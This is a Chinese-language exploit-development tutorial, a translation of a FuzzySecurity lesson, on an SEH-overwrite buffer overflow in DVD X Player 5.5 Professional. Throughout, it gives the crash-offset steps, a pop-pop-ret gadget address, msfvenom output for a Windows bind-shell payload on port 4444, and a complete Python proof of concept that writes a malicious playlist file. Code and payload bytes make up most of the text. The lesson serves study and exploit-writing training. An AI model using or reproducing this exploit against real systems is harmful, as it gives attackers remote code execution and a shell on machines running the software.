原文地址:https://www.fuzzysecurity.com/tutorials/expDev/3.html
发现看雪有翻译的:https://bbs.pediy.com/user-686289-2.htm
有漏洞的软件
链接:https://pan.baidu.com/s/1XIVgoo7t2kCwbd1wZLJ7Zw
提取码:khmh
在xp虚拟机里安装上面下载的安装包,然后用下面的脚本创建一个文件,绕后用安装好的软件来打开这个文件,造成缓冲区溢出,覆盖seh链
filename="evil.plf"
buffer = "A"*2000
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
先运行软件,然后debugger attach 上去以后,点击运行。
按下图,打开我们上面用脚本创建好的文件
点击open playlist后,debugger会卡住,此时按shift+F9,继续运行,然后再切换到DVD X Player
可以发现已经成功覆盖了seh链
使用gdb的peda插件来判断偏移
gdb-peda$ pattern create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
将上面的字符串替换到那个文件里去。然后重复上面的步骤,再来看SEH链,handler被覆盖成了0x24424142
确定偏移
好的,到目前为止,基于这些信息,我们可以重建我们的缓冲区,如下所示。我们将为nSEH分配4个字节,它应该直接放在SEH之前,SEH也会占用4个字节
Ok so far so good, based on this information we can reconstruct our buffer as shown below. We will be allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.
再次构造buffer
buffer = “A”*608 + [nSEH] + [SEH] + “D”*1384
buffer = “A”*608 + “B”*4 + “C”*4 + “D”*1384
再次crash后,使用mona来查找pop pop ret gadgets
这里使用
0x61617619 : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll)
再次构造buffer
filename="evil.plf"
buffer = "A"*608 + "B"*4 + "\x19\x76\x61\x61" + "D"*1384
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
打开程序,attach上去,给0x61617619地址下断点,然后用有漏洞的软件打开文件后,通过Shift-F9传递第一个异常后,到了断点
执行完ret之后,可以看到跳转到了0x12f5b8处执行命令,而这里是我们的栈空间,我们输入的字符’B’被当做了shellcode执行。
并且可以看到0x12F5C0为我们的’D’字符串,所以我们将’B’字符串替换成指令 jmp 0x12F5C0
所以最终的poc如下,shellcode用的上一章的,不过生成的时候,排除坏字节与上一章的不一样。
# root @ kali in ~ [9:04:36]
$ msfvenom -p windows/shell_bind_tcp lport=4444 -f c -b '\x00\x0A\x0D\x1A'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] =
"\xdb\xd3\xb8\x1c\x01\x75\xbc\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x83\xc5\x04\x31\x45\x13\x03\x59\x12\x97\x49\x9d\xfc\xd5"
"\xb2\x5d\xfd\xb9\x3b\xb8\xcc\xf9\x58\xc9\x7f\xca\x2b\x9f\x73"
"\xa1\x7e\x0b\x07\xc7\x56\x3c\xa0\x62\x81\x73\x31\xde\xf1\x12"
"\xb1\x1d\x26\xf4\x88\xed\x3b\xf5\xcd\x10\xb1\xa7\x86\x5f\x64"
"\x57\xa2\x2a\xb5\xdc\xf8\xbb\xbd\x01\x48\xbd\xec\x94\xc2\xe4"
"\x2e\x17\x06\x9d\x66\x0f\x4b\x98\x31\xa4\xbf\x56\xc0\x6c\x8e"
"\x97\x6f\x51\x3e\x6a\x71\x96\xf9\x95\x04\xee\xf9\x28\x1f\x35"
"\x83\xf6\xaa\xad\x23\x7c\x0c\x09\xd5\x51\xcb\xda\xd9\x1e\x9f"
"\x84\xfd\xa1\x4c\xbf\xfa\x2a\x73\x6f\x8b\x69\x50\xab\xd7\x2a"
"\xf9\xea\xbd\x9d\x06\xec\x1d\x41\xa3\x67\xb3\x96\xde\x2a\xdc"
"\x5b\xd3\xd4\x1c\xf4\x64\xa7\x2e\x5b\xdf\x2f\x03\x14\xf9\xa8"
"\x64\x0f\xbd\x26\x9b\xb0\xbe\x6f\x58\xe4\xee\x07\x49\x85\x64"
"\xd7\x76\x50\x10\xdf\xd1\x0b\x07\x22\xa1\xfb\x87\x8c\x4a\x16"
"\x08\xf3\x6b\x19\xc2\x9c\x04\xe4\xed\xb3\x88\x61\x0b\xd9\x20"
"\x24\x83\x75\x83\x13\x1c\xe2\xfc\x71\x34\x84\xb5\x93\x83\xab"
"\x45\xb6\xa3\x3b\xce\xd5\x77\x5a\xd1\xf3\xdf\x0b\x46\x89\xb1"
"\x7e\xf6\x8e\x9b\xe8\x9b\x1d\x40\xe8\xd2\x3d\xdf\xbf\xb3\xf0"
"\x16\x55\x2e\xaa\x80\x4b\xb3\x2a\xea\xcf\x68\x8f\xf5\xce\xfd"
"\xab\xd1\xc0\x3b\x33\x5e\xb4\x93\x62\x08\x62\x52\xdd\xfa\xdc"
"\x0c\xb2\x54\x88\xc9\xf8\x66\xce\xd5\xd4\x10\x2e\x67\x81\x64"
"\x51\x48\x45\x61\x2a\xb4\xf5\x8e\xe1\x7c\x05\xc5\xab\xd5\x8e"
"\x80\x3e\x64\xd3\x32\x95\xab\xea\xb0\x1f\x54\x09\xa8\x6a\x51"
"\x55\x6e\x87\x2b\xc6\x1b\xa7\x98\xe7\x09";
POC如下
filename="evil.plf"
shellcode = (
"\xdb\xd3\xb8\x1c\x01\x75\xbc\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x53\x83\xc5\x04\x31\x45\x13\x03\x59\x12\x97\x49\x9d\xfc\xd5"
"\xb2\x5d\xfd\xb9\x3b\xb8\xcc\xf9\x58\xc9\x7f\xca\x2b\x9f\x73"
"\xa1\x7e\x0b\x07\xc7\x56\x3c\xa0\x62\x81\x73\x31\xde\xf1\x12"
"\xb1\x1d\x26\xf4\x88\xed\x3b\xf5\xcd\x10\xb1\xa7\x86\x5f\x64"
"\x57\xa2\x2a\xb5\xdc\xf8\xbb\xbd\x01\x48\xbd\xec\x94\xc2\xe4"
"\x2e\x17\x06\x9d\x66\x0f\x4b\x98\x31\xa4\xbf\x56\xc0\x6c\x8e"
"\x97\x6f\x51\x3e\x6a\x71\x96\xf9\x95\x04\xee\xf9\x28\x1f\x35"
"\x83\xf6\xaa\xad\x23\x7c\x0c\x09\xd5\x51\xcb\xda\xd9\x1e\x9f"
"\x84\xfd\xa1\x4c\xbf\xfa\x2a\x73\x6f\x8b\x69\x50\xab\xd7\x2a"
"\xf9\xea\xbd\x9d\x06\xec\x1d\x41\xa3\x67\xb3\x96\xde\x2a\xdc"
"\x5b\xd3\xd4\x1c\xf4\x64\xa7\x2e\x5b\xdf\x2f\x03\x14\xf9\xa8"
"\x64\x0f\xbd\x26\x9b\xb0\xbe\x6f\x58\xe4\xee\x07\x49\x85\x64"
"\xd7\x76\x50\x10\xdf\xd1\x0b\x07\x22\xa1\xfb\x87\x8c\x4a\x16"
"\x08\xf3\x6b\x19\xc2\x9c\x04\xe4\xed\xb3\x88\x61\x0b\xd9\x20"
"\x24\x83\x75\x83\x13\x1c\xe2\xfc\x71\x34\x84\xb5\x93\x83\xab"
"\x45\xb6\xa3\x3b\xce\xd5\x77\x5a\xd1\xf3\xdf\x0b\x46\x89\xb1"
"\x7e\xf6\x8e\x9b\xe8\x9b\x1d\x40\xe8\xd2\x3d\xdf\xbf\xb3\xf0"
"\x16\x55\x2e\xaa\x80\x4b\xb3\x2a\xea\xcf\x68\x8f\xf5\xce\xfd"
"\xab\xd1\xc0\x3b\x33\x5e\xb4\x93\x62\x08\x62\x52\xdd\xfa\xdc"
"\x0c\xb2\x54\x88\xc9\xf8\x66\xce\xd5\xd4\x10\x2e\x67\x81\x64"
"\x51\x48\x45\x61\x2a\xb4\xf5\x8e\xe1\x7c\x05\xc5\xab\xd5\x8e"
"\x80\x3e\x64\xd3\x32\x95\xab\xea\xb0\x1f\x54\x09\xa8\x6a\x51"
"\x55\x6e\x87\x2b\xc6\x1b\xa7\x98\xe7\x09")
evil = "\x90"*20 + shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()